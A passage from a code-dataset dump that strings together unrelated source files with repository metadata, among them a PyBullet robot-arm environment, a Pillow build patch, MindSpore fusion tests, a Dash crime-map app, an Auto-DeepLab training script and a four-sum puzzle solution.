p.getCameraImage(width=960, height=960, viewMatrix=self.view_matrix, projectionMatrix=self.projection_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) self.images = px p.enableJointForceTorqueSensor(bodyUniqueId=self.kuka_id, jointIndex=self.num_joints - 1, enableSensor=True) self.object_pos = p.getBasePositionAndOrientation(self.object_id)[0] self.images = self.images[:, :, : 3] # the 4th channel is alpha channel, we do not need it. return self._process_image(self.images) def _process_image(self, image): """Convert the RGB pic to gray pic and add a channel 1 Args: image ([type]): [description] """ if image is not None: image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) image = cv2.resize(image, (self.kImageSize['width'], self.kImageSize['height']))[None, :, :] / 255. return image else: return np.zeros((1, self.kImageSize['width'], self.kImageSize['height'])) def step(self, action): dv = 0.005 dx = action[0] * dv dy = action[1] * dv dz = action[2] * dv self.current_pos = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] self.new_robot_pos = [ self.current_pos[0] + dx, self.current_pos[1] + dy, self.current_pos[2] + dz ] self.robot_joint_positions = p.calculateInverseKinematics( bodyUniqueId=self.kuka_id, endEffectorLinkIndex=self.num_joints - 1, targetPosition=[ self.new_robot_pos[0], self.new_robot_pos[1], self.new_robot_pos[2] ], targetOrientation=self.orientation, jointDamping=self.joint_damping, ) for i in range(self.num_joints): p.resetJointState( bodyUniqueId=self.kuka_id, jointIndex=i, targetValue=self.robot_joint_positions[i], ) p.stepSimulation() # 在代码开始部分,如果定义了is_good_view,那么机械臂的动作会变慢,方便观察 if self.is_good_view: time.sleep(0.05) self.step_counter += 1 return self._reward() def _reward(self): # 一定注意是取第4个值,请参考pybullet手册的这个函数返回值的说明 self.robot_state = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] self.object_state = np.array( p.getBasePositionAndOrientation(self.object_id)[0]).astype( np.float32) square_dx = (self.robot_state[0] - self.object_state[0]) ** 2 square_dy = (self.robot_state[1] - self.object_state[1]) ** 2 square_dz = (self.robot_state[2] - self.object_state[2]) ** 2 # 用机械臂末端和物体的距离作为奖励函数的依据 self.distance = sqrt(square_dx + square_dy + square_dz) # print(self.distance) x = self.robot_state[0] y = self.robot_state[1] z = self.robot_state[2] # 如果机械比末端超过了obs的空间,也视为done,而且会给予一定的惩罚 terminated = bool(x < self.x_low_obs or x > self.x_high_obs or y < self.y_low_obs or y > self.y_high_obs or z < self.z_low_obs or z > self.z_high_obs) if terminated: reward = -0.1 self.terminated = True # 如果机械臂一直无所事事,在最大步数还不能接触到物体,也需要给一定的惩罚 elif self.step_counter > self.kMaxEpisodeSteps: reward = -0.1 self.terminated = True elif self.distance < 0.1: reward = 1 self.terminated = True else: reward = 0 self.terminated = False info = {'distance:', self.distance} (_, _, px, _, _) = p.getCameraImage(width=960, height=960, viewMatrix=self.view_matrix, projectionMatrix=self.projection_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) self.images = px self.processed_image = self._process_image(self.images) # self.observation=self.robot_state self.observation = self.object_state return self.processed_image, reward, self.terminated, info def close(self): p.disconnect() def _get_force_sensor_value(self): force_sensor_value = p.getJointState(bodyUniqueId=self.kuka_id, jointIndex=self.num_joints - 1)[2][2] # the first 2 stands for jointReactionForces, the second 2 stands for Fz, # the pybullet methods' return is a tuple,so can not # index it with str like dict. I think it can be improved # that return value is a dict rather than tuple. return force_sensor_value class CustomSkipFrame(gym.Wrapper): """ Make a 4 frame skip, so the observation space will change to (4,84,84) from (1,84,84) Args: gym ([type]): [description] """ def __init__(self, env, skip=4): super(CustomSkipFrame, self).__init__(env) self.observation_space = spaces.Box(low=0, high=1, shape=(skip, self.kFinalImageSize['width'], self.kFinalImageSize['height'])) self.skip = skip def step(self, action): total_reward = 0 states = [] state, reward, done, info = self.env.step(action) for i in range(self.skip): if not done: state, reward, done, info = self.env.step(action) total_reward += reward states.append(state) else: states.append(state) states = np.concatenate(states, 0)[None, :, :, :] return random_crop(states.astype(np.float32), self.kFinalImageSize['width']), reward, done, info def reset(self): state = self.env.reset() states = np.concatenate([state for _ in range(self.skip)], 0)[None, :, :, :] return random_crop(states.astype(np.float32), self.kFinalImageSize['width']) if __name__ == '__main__': # 这一部分是做baseline,即让机械臂随机选择动作,看看能够得到的分数 import matplotlib.pyplot as plt env = KukaReachVisualEnv(is_render=False) env = CustomSkipFrame(env) print(env.observation_space.shape) print(env.action_space.shape) print(env.action_space.n) # for _ in range(20): # action=env.action_space.sample() # print(action) # env.step(action) # # state = env.reset() # print(state.shape) # img = state[0][0] # plt.imshow(img, cmap='gray') # plt.show()
36.159036
121
0.53212
14,041
0.912583
0
0
0
0
0
0
2,281
0.148252
bec8bbb28dfc0d99421b26ef588fd15b586c1fe9
509
py
Python
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
17
2017-04-22T21:53:52.000Z
2021-01-21T16:57:55.000Z
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
186
2017-09-12T20:46:52.000Z
2021-11-27T18:15:14.000Z
bucket_4C/python-Pillow/patches/patch-setup.py
jrmarino/ravensource
91d599fd1f2af55270258d15e72c62774f36033e
[ "FTL" ]
74
2017-09-06T14:48:01.000Z
2021-08-28T02:48:27.000Z
--- setup.py.orig 2019-07-02 19:13:39 UTC +++ setup.py @@ -465,9 +465,7 @@ class pil_build_ext(build_ext): _add_directory(include_dirs, "/usr/X11/include") elif ( - sys.platform.startswith("linux") - or sys.platform.startswith("gnu") - or sys.platform.startswith("freebsd") + sys.platform.startswith("nothing") ): for dirname in _find_library_dirs_ldconfig(): _add_directory(library_dirs, dirname)
36.357143
65
0.579568
97
0.19057
0
0
0
0
0
0
48
0.094303
bec8c0835477d8b4651705098efe6f5b0368b832
6,581
py
Python
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py
GeekHee/mindspore
896b8e5165dd0a900ed5a39e0fb23525524bf8b0
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ from mindspore.ops import Primitive from mindspore.ops import operations as P from mindspore.ops.operations import _grad_ops as G from mindspore.ops import _constants as Constants # pylint: disable=unused-variable tuple_getitem = Primitive(Constants.kTupleGetItem) add = P.Add() allreduce = P.AllReduce() allreduce.add_prim_attr('fusion', 1) make_tuple = Primitive("make_tuple") conv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode="valid", pad=0, stride=1, dilation=1, group=1) bn = P.FusedBatchNorm() relu = P.ReLU() conv_bn1 = Primitive('ConvBN1') bn2_add_relu = Primitive('BN2AddRelu') bn2_relu = Primitive('BN2Relu') fused_bn1 = Primitive('FusedBN1') fused_bn2 = Primitive('FusedBN2') fused_bn3 = Primitive('FusedBN3') bn_grad = G.FusedBatchNormGrad() bn_grad1 = Primitive('BNGrad1') bn_grad2 = Primitive('BNGrad2') bn_grad3 = Primitive('BNGrad3') class FnDict: def __init__(self): self.fnDict = {} def __call__(self, fn): self.fnDict[fn.__name__] = fn def __getitem__(self, name): return self.fnDict[name] def test_bn_split(tag): """ test_split_bn_fusion """ fns = FnDict() @fns def before(x, scale, b, mean, variance): bn_output = bn(x, scale, b, mean, variance) item0 = tuple_getitem(bn_output, 0) return item0 @fns def after(x, scale, b, mean, variance): fused_bn1_output = fused_bn1(x) fused_bn2_input0 = tuple_getitem(fused_bn1_output, 0) fused_bn2_input1 = tuple_getitem(fused_bn1_output, 1) fused_bn2_output = fused_bn2(fused_bn2_input0, fused_bn2_input1, mean, variance) fused_bn3_input1 = tuple_getitem(fused_bn2_output, 0) fused_bn3_input2 = tuple_getitem(fused_bn2_output, 1) fused_bn3_output = fused_bn3(x, fused_bn3_input1, fused_bn3_input2, scale, b) output1 = tuple_getitem(fused_bn2_output, 2) output2 = tuple_getitem(fused_bn2_output, 3) output3 = tuple_getitem(fused_bn2_output, 0) output4 = tuple_getitem(fused_bn2_output, 1) output = make_tuple(fused_bn3_output, output1, output2, output3, output4) item0 = tuple_getitem(output, 0) return make_tuple(item0) return fns[tag] def test_bn_grad_split(tag): """ test_bn_grad_split """ fns = FnDict() @fns def before(dy, x, scale, save_mean, save_inv_variance): bn_grad_output = bn_grad(dy, x, scale, save_mean, save_inv_variance) item0 = tuple_getitem(bn_grad_output, 0) item1 = tuple_getitem(bn_grad_output, 1) item2 = tuple_getitem(bn_grad_output, 2) output = make_tuple(item0, item1, item2) res = tuple_getitem(output, 0) return res @fns def after(i0, i1, i2, i3, i4): bn_grad1_output = bn_grad1(i0, i1, i3) bn_grad1_item0 = tuple_getitem(bn_grad1_output, 0) bn_grad1_item1 = tuple_getitem(bn_grad1_output, 1) bn_grad1_item2 = tuple_getitem(bn_grad1_output, 2) bn_grad2_output = bn_grad2(bn_grad1_item0, bn_grad1_item1, i4, i2) bn_grad2_item0 = tuple_getitem(bn_grad2_output, 0) bn_grad2_item1 = tuple_getitem(bn_grad2_output, 1) bn_grad2_item2 = tuple_getitem(bn_grad2_output, 2) bn_grad2_item3 = tuple_getitem(bn_grad2_output, 3) bn_grad2_item4 = tuple_getitem(bn_grad2_output, 4) bn_grad3_output = bn_grad3(i0, bn_grad2_item2, bn_grad2_item3, bn_grad2_item4, bn_grad1_item2) bn_grad_make_tuple = make_tuple(bn_grad3_output, bn_grad2_item0, bn_grad2_item1) item0 = tuple_getitem(bn_grad_make_tuple, 0) item1 = tuple_getitem(bn_grad_make_tuple, 1) item2 = tuple_getitem(bn_grad_make_tuple, 2) output = make_tuple(item0, item1, item2) return make_tuple(tuple_getitem(output, 0)) return fns[tag] def test_all_reduce_fusion_all(tag): """ test_all_reduce_fusion_all """ fns = FnDict() @fns def before(x1, x2, x3, x4, x5): y1 = allreduce(x1) y2 = allreduce(x2) y3 = allreduce(x3) y4 = allreduce(x4) y5 = allreduce(x5) return make_tuple(y1, y2, y3, y4, y5) @fns def after(x1, x2, x3, x4, x5): ar = allreduce(x5, x4, x3, x2, x1) y5 = tuple_getitem(ar, 0) y4 = tuple_getitem(ar, 1) y3 = tuple_getitem(ar, 2) y2 = tuple_getitem(ar, 3) y1 = tuple_getitem(ar, 4) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) @fns def after1(x1, x2, x3, x4, x5): ar = allreduce(x1, x2, x3, x4, x5) y1 = tuple_getitem(ar, 0) y2 = tuple_getitem(ar, 1) y3 = tuple_getitem(ar, 2) y4 = tuple_getitem(ar, 3) y5 = tuple_getitem(ar, 4) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) return fns[tag] def test_all_reduce_fusion_group(tag): """ test_all_reduce_fusion_group """ fns = FnDict() @fns def before(x1, x2, x3, x4, x5): y1 = allreduce(x1) y2 = allreduce(x2) y3 = allreduce(x3) y4 = allreduce(x4) y5 = allreduce(x5) return make_tuple(y1, y2, y3, y4, y5) @fns def after1(x1, x2, x3, x4, x5): ar1 = allreduce(x5, x4) ar2 = allreduce(x3, x2, x1) y4 = tuple_getitem(ar1, 1) y5 = tuple_getitem(ar1, 0) y1 = tuple_getitem(ar2, 2) y2 = tuple_getitem(ar2, 1) y3 = tuple_getitem(ar2, 0) res = make_tuple(y1, y2, y3, y4, y5) return make_tuple(res) @fns def after2(x1, x2, x3, x4, x5): ar1 = allreduce(x1, x3, x5) ar2 = allreduce(x2, x4) y1 = tuple_getitem(ar1, 2) y3 = tuple_getitem(ar1, 1) y5 = tuple_getitem(ar1, 0) y2 = tuple_getitem(ar2, 1) y4 = tuple_getitem(ar2, 0) output = make_tuple(y1, y2, y3, y4, y5) return make_tuple(output) return fns[tag]
33.576531
110
0.647166
196
0.029783
0
0
4,348
0.66069
0
0
924
0.140404
bec9227899c9767af55354a2d39773951766ff07
486
py
Python
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
2
2020-09-18T12:43:48.000Z
2020-11-10T00:34:15.000Z
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
59
2020-07-24T00:04:53.000Z
2022-03-29T11:15:48.000Z
tdx/abc.py
TrainerDex/DiscordBot
7e7bb20c5ac76bed236a7458c31017b8ddd8b8be
[ "Apache-2.0" ]
1
2022-01-12T12:33:15.000Z
2022-01-12T12:33:15.000Z
from abc import ABC from typing import Dict from redbot.core import Config from redbot.core.bot import Red from trainerdex.client import Client class MixinMeta(ABC): """ Base class for well behaved type hint detection with composite class. Basically, to keep developers sane when not all attributes are defined in each mixin. """ def __init__(self, *_args): self.bot: Red self.config: Config self.client: Client self.emoji: Dict
23.142857
89
0.699588
338
0.695473
0
0
0
0
0
0
176
0.36214
fe1f4c025bf53ebda91717d8cd83c5c619dbfc64
7,044
py
Python
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
app.py
PolinaRomanchenko/Victorious_Secret_DSCI_532
e83bc19169a1736618ac55f2ade40741583089fd
[ "MIT" ]
null
null
null
import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc import pandas as pd import numpy as np import altair as alt import vega_datasets alt.data_transformers.enable('default') alt.data_transformers.disable_max_rows() app = dash.Dash(__name__, assets_folder='assets', external_stylesheets=[dbc.themes.BOOTSTRAP]) # Boostrap CSS. app.css.append_css({'external_url': 'https://codepen.io/amyoshino/pen/jzXypZ.css'}) # noqa: E501 server = app.server app.title = 'Dash app with pure Altair HTML' df = pd.read_csv('data/Police_Department_Incidents_-_Previous_Year__2016_.csv') # df = pd.read_csv("https://raw.github.ubc.ca/MDS-2019-20/DSCI_531_lab4_anas017/master/data/Police_Department_Incidents_-_Previous_Year__2016_.csv?token=AAAHQ0dLxUd74i7Zhzh1SJ_UuOaFVI3_ks5d5dT3wA%3D%3D") df['datetime'] = pd.to_datetime(df[["Date","Time"]].apply(lambda x: x[0].split()[0] +" "+x[1], axis=1), format="%m/%d/%Y %H:%M") df['hour'] = df['datetime'].dt.hour df.dropna(inplace=True) top_4_crimes = df['Category'].value_counts()[:6].index.to_list() top_4_crimes top_4_crimes.remove("NON-CRIMINAL") top_4_crimes.remove("OTHER OFFENSES") # top 4 crimes df subset df_t4 = df[df["Category"].isin(top_4_crimes)].copy() def make_plot_top(df_new=df_t4): # Create a plot of the Displacement and the Horsepower of the cars dataset # making the slider slider = alt.binding_range(min = 0, max = 23, step = 1) select_hour = alt.selection_single(name='select', fields = ['hour'], bind = slider, init={'hour': 0}) #begin of my code # typeDict = {'ASSAULT':'quantitative', # 'VANDALISM':'quantitative', # 'LARCENY/THEFT':'quantitative', # 'VEHICLE THEFT':'quantitative' # } # end chart = alt.Chart(df_new).mark_bar(size=30).encode( x=alt.X('Category',type='nominal', title='Category'), y=alt.Y('count()', title = "Count" , scale = alt.Scale(domain = (0,3300))), tooltip='count()' ).properties( title = "Per hour crime occurrences for the top 4 crimes", width=500, height = 315 ).add_selection( select_hour ).transform_filter( select_hour ) return chart def make_plot_bot(data=df_t4): chart_1 = alt.Chart(data).mark_circle(size=3, opacity = 0.8).encode( longitude='X:Q', latitude='Y:Q', color = alt.Color('PdDistrict:N', legend = alt.Legend(title = "District")), tooltip = 'PdDistrict' ).project( type='albersUsa' ).properties( width=450, height=350 ) chart_2 = alt.Chart(data).mark_bar().encode( x=alt.X('PdDistrict:N', axis=None, title="District"), y=alt.Y('count()', title="Count of reports"), color=alt.Color('PdDistrict:N', legend=alt.Legend(title="District")), tooltip=['PdDistrict', 'count()'] ).properties( width=450, height=350 ) # A dropdown filter crimes_dropdown = alt.binding_select(options=list(data['Category'].unique())) crimes_select = alt.selection_single(fields=['Category'], bind=crimes_dropdown, name="Pick\ Crime") combine_chart = (chart_2 | chart_1) filter_crimes = combine_chart.add_selection( crimes_select ).transform_filter( crimes_select ) return filter_crimes body = dbc.Container( [ dbc.Row( [ dbc.Col( [ html.H2("San Francisco Crime"), html.P( """\ When looking for a place to live or visit, one important factor that people will consider is the safety of the neighborhood. Searching that information district by district could be time consuming and exhausting. It is even more difficult to compare specific crime statistics across districts such as the crime rate at a certain time of day. It would be useful if people can look up crime related information across district on one application. Our app aims to help people make decisions when considering their next trip or move to San Francisco, California via visually exploring a dataset of crime statistics. The app provides an overview of the crime rate across neighborhoods and allows users to focus on more specific information through filtering of geological location, crime rate, crime type or time of the crime. Use the box below to choose crimes of interest. """ ), dcc.Dropdown( id = 'drop_selection_crime', options=[{'label': i, 'value': i} for i in df_t4['Category'].unique() ], style={'height': '20px', 'width': '400px'}, value=df_t4['Category'].unique(), multi=True) ], md=5, ), dbc.Col( [ dbc.Row( [ html.Iframe( sandbox = "allow-scripts", id = "plot_top", height = "500", width = "650", style = {"border-width": "0px"}, srcDoc = make_plot_top().to_html() ) ] ) ] ), ] ), dbc.Row( html.Iframe( sandbox='allow-scripts', id='plot_bot', height='500', width='1200', style={'border-width': '0px'}, srcDoc= make_plot_bot().to_html() ) ) ], className="mt-4", ) app.layout = html.Div(body) @app.callback([dash.dependencies.Output('plot_top', 'srcDoc'), dash.dependencies.Output('plot_bot', 'srcDoc')], [dash.dependencies.Input('drop_selection_crime', 'value')] ) def update_df(chosen): new_df = df_t4[(df_t4["Category"].isin(chosen))] updated_plot_top = make_plot_top(new_df).to_html() updated_plot_bottom = make_plot_bot(new_df).to_html() return updated_plot_top, updated_plot_bottom if __name__ == '__main__': app.run_server(debug=False)
38.917127
203
0.534923
0
0
0
0
423
0.060051
0
0
2,693
0.382311
fe2001122588d2b0248d76d502b21c18d29d729d
40
py
Python
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py
johnson880319/Software
045894227f359e0a3a3ec5b7a53f8d1ebc06acdd
[ "CC-BY-2.0" ]
null
null
null
# coding=utf-8 from .subspaces import *
13.333333
24
0.725
0
0
0
0
0
0
0
0
14
0.35
fe2070ac8557cbd4275cc5e584c79388af700674
2,510
py
Python
detection/contor.py
chika626/chainer_rep
a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
null
null
null
detection/contor.py
chika626/chainer_rep
a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
7
2020-03-13T08:29:46.000Z
2020-05-27T17:34:14.000Z
detection/contor.py
chika626/chainer_rep
a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
null
null
null
import json import math from PIL import Image,ImageDraw import pandas as pd import glob import argparse import copy import numpy as np import matplotlib.pyplot as plt import pickle import cv2 from PIL import ImageEnhance import chainer from chainer.datasets import ConcatenatedDataset from chainer.datasets import TransformDataset from chainer.optimizer_hooks import WeightDecay from chainer import serializers from chainer import training from chainer.training import extensions from chainer.training import triggers from chainercv.datasets import voc_bbox_label_names from chainercv.datasets import VOCBboxDataset from chainercv.extensions import DetectionVOCEvaluator from chainercv.links.model.ssd import GradientScaling from chainercv.links.model.ssd import multibox_loss from chainercv.links import SSD300 from chainercv.links import SSD512 from chainercv import transforms from chainercv.utils import read_image from chainercv.links.model.ssd import random_crop_with_bbox_constraints from chainercv.links.model.ssd import random_distort from chainercv.links.model.ssd import resize_with_random_interpolation import queue def run(img): # c , H , W = img.shape H,W = img.size img = np.asarray(img) # 変換後データ配列 transed = Image.new('RGB',(H,W)) for x in range(H): for y in range(W): transed.putpixel((x,y),(255,255,255)) for x in range(H): for y in range(W): if x + 1 == H or y + 1 == W: break if img[y][x][0] != img[y][x+1][0]: transed.putpixel((x,y),(0,0,0)) for y in range(W): for x in range(H): if x + 1 == H or y + 1 == W: break if img[y][x][0] != img[y+1][x][0]: transed.putpixel((x,y),(0,0,0)) return transed def main(): # # 単一の場合のコード # img = Image.open('cont/transed/X.jpg') # img=img.convert('L') # img=np.asarray(img) # ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU) # img=Image.fromarray(img) # img=img.convert('RGB') # transed = run(img) # transed.save('transec_0.png') # return # 大量変換機 img_path=glob.glob("cont/crop/*") counter=0 for path in img_path: img = Image.open(path) transed = run(img) transed.save('transec_{}.png'.format(counter)) counter+=1 if __name__ == '__main__': main()
26.989247
72
0.640239
0
0
0
0
0
0
0
0
403
0.157792
fe2074c1f1219a5f9d1c7d8eeb8c9be145ffb2ea
5,982
py
Python
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
1
2020-07-27T07:08:47.000Z
2020-07-27T07:08:47.000Z
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
null
null
null
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
null
null
null
import os import pdb import warnings import numpy as np import torch import torch.nn as nn import torch.utils.data import torch.backends.cudnn import torch.optim as optim import dataloaders from utils.utils import AverageMeter from utils.loss import build_criterion from utils.metrics import Evaluator from utils.step_lr_scheduler import Iter_LR_Scheduler from retrain_model.build_autodeeplab import Retrain_Autodeeplab from config_utils.re_train_autodeeplab import obtain_retrain_autodeeplab_args def main(): warnings.filterwarnings('ignore') assert torch.cuda.is_available() torch.backends.cudnn.benchmark = True args = obtain_retrain_autodeeplab_args() save_dir = os.path.join('./data/', args.save_path) if not os.path.isdir(save_dir): os.mkdir(save_dir) model_fname = os.path.join(save_dir, 'deeplab_{0}_{1}_v3_{2}_epoch%d.pth'.format(args.backbone, args.dataset, args.exp)) record_name = os.path.join(save_dir, 'training_record.txt') if args.dataset == 'pascal': raise NotImplementedError elif args.dataset == 'cityscapes': kwargs = {'num_workers': args.workers, 'pin_memory': True, 'drop_last': True} dataset_loader, num_classes, val_loader = dataloaders.make_data_loader(args, **kwargs) args.num_classes = num_classes else: raise ValueError('Unknown dataset: {}'.format(args.dataset)) if args.backbone == 'autodeeplab': model = Retrain_Autodeeplab(args) else: raise ValueError('Unknown backbone: {}'.format(args.backbone)) if args.criterion == 'Ohem': args.thresh = 0.7 args.crop_size = [args.crop_size, args.crop_size] if isinstance(args.crop_size, int) else args.crop_size args.n_min = int((args.batch_size / len(args.gpu) * args.crop_size[0] * args.crop_size[1]) // 16) criterion = build_criterion(args) model = nn.DataParallel(model).cuda() model.train() if args.freeze_bn: for m in model.modules(): if isinstance(m, nn.BatchNorm2d): m.eval() m.weight.requires_grad = False m.bias.requires_grad = False optimizer = optim.SGD(model.module.parameters(), lr=args.base_lr, momentum=0.9, weight_decay=0.0001) max_iteration = len(dataset_loader) * args.epochs scheduler = Iter_LR_Scheduler(args, max_iteration, len(dataset_loader)) start_epoch = 0 evaluator=Evaluator(num_classes) if args.resume: if os.path.isfile(args.resume): print('=> loading checkpoint {0}'.format(args.resume)) checkpoint = torch.load(args.resume) start_epoch = checkpoint['epoch'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) print('=> loaded checkpoint {0} (epoch {1})'.format(args.resume, checkpoint['epoch'])) else: raise ValueError('=> no checkpoint found at {0}'.format(args.resume)) for epoch in range(start_epoch, args.epochs): losses = AverageMeter() print('Training epoch {}'.format(epoch)) model.train() for i, sample in enumerate(dataset_loader): cur_iter = epoch * len(dataset_loader) + i scheduler(optimizer, cur_iter) inputs = sample['image'].cuda() target = sample['label'].cuda() outputs = model(inputs) loss = criterion(outputs, target) if np.isnan(loss.item()) or np.isinf(loss.item()): pdb.set_trace() losses.update(loss.item(), args.batch_size) loss.backward() optimizer.step() optimizer.zero_grad() if (i + 1) % 200 == 0: print('epoch: {0}\t''iter: {1}/{2}\t''lr: {3:.6f}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format( epoch + 1, i + 1, len(dataset_loader), scheduler.get_lr(optimizer), loss=losses)) if epoch < args.epochs: if (epoch+1) % 5 == 0: torch.save({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), }, model_fname % (epoch + 1)) else: torch.save({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), }, model_fname % (epoch + 1)) line0 = 'epoch: {0}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format( epoch, loss=losses) with open(record_name, 'a') as f: f.write(line0) if line0[-1] != '\n': f.write('\n') if epoch%3!=0 and epoch <args.epochs-20: continue print('Validate epoch {}'.format(epoch)) model.eval() evaluator.reset() test_loss=0.0 for i,sample in enumerate(val_loader): inputs = sample['image'].cuda() target = sample['label'].cuda() with torch.no_grad(): outputs = model(inputs) # loss = criterion(outputs, target) # test_loss+=loss.item() pred=outputs.data.cpu().numpy() target=target.cpu().numpy() pred = np.argmax(pred, axis=1) evaluator.add_batch(target,pred) Acc = evaluator.Pixel_Accuracy() Acc_class = evaluator.Pixel_Accuracy_Class() mIoU = evaluator.Mean_Intersection_over_Union() FWIoU = evaluator.Frequency_Weighted_Intersection_over_Union() print("epoch: {}\t Acc:{:.3f}, Acc_class:{:.3f}, mIoU:{:.3f}, fwIoU: {:.3f}".format(epoch,Acc, Acc_class, mIoU, FWIoU)) line1='epoch: {}\t''mIoU: {:.3f}'.format(epoch,mIoU) with open(record_name, 'a') as f: f.write(line1) if line1[-1] != '\n': f.write('\n') if __name__ == "__main__": main()
38.844156
127
0.596122
0
0
0
0
0
0
0
0
777
0.12989
fe21c2ef055f99448891893a1c18824fdde9d61e
1,883
py
Python
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
class Solution: # dictionary keys are tuples, storing results # structure of the tuple: # (level, prev_sum, val_to_include) # value is number of successful tuples def fourSumCount(self, A, B, C, D, prev_sum=0, level=0, sums={}): """ :type A: List[int] :type B: List[int] :type C: List[int] :type D: List[int] :rtype: int """ # handle clearing dictionary between tests sums = {} if level == 3 else sums # base case: if level == 3: total = 0 for num in D: if prev_sum + num == 0: print("At level 3, 0 total found using entry w/ value {0}". format(num)) total += 1 return total total = 0 lists = [A, B, C] for num in lists[level]: if level == 0: print(str(sums)) if (level, prev_sum, num) in sums: total += sums[(level, prev_sum, num)] print("Used dictionary entry {0}, making total {1}". format((level, prev_sum, num), total)) else: print("Call from level {0} to level {1}; current sum is {2}". format(level, level + 1, prev_sum + num)) result = self.fourSumCount(A, B, C, D, prev_sum + num, level + 1, sums) sums[(level, prev_sum, num)] = result total += result if level == 0: sums = {} print(sums) return total sol = Solution() A = [1] B = [-1] C = [0] D = [1] result = sol.fourSumCount(A, B, C, D) print("Test 1: {0}".format(result)) A = [1, 2] B = [-2, -1] C = [-1, 2] D = [0, 2] result = sol.fourSumCount(A, B, C, D) print("Test 2: {0}".format(result))
31.383333
79
0.463622
1,636
0.868826
0
0
0
0
0
0
517
0.274562
fe21f2c89737b3c4d120cba724974597cb079bc4
1,675
py
Python
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
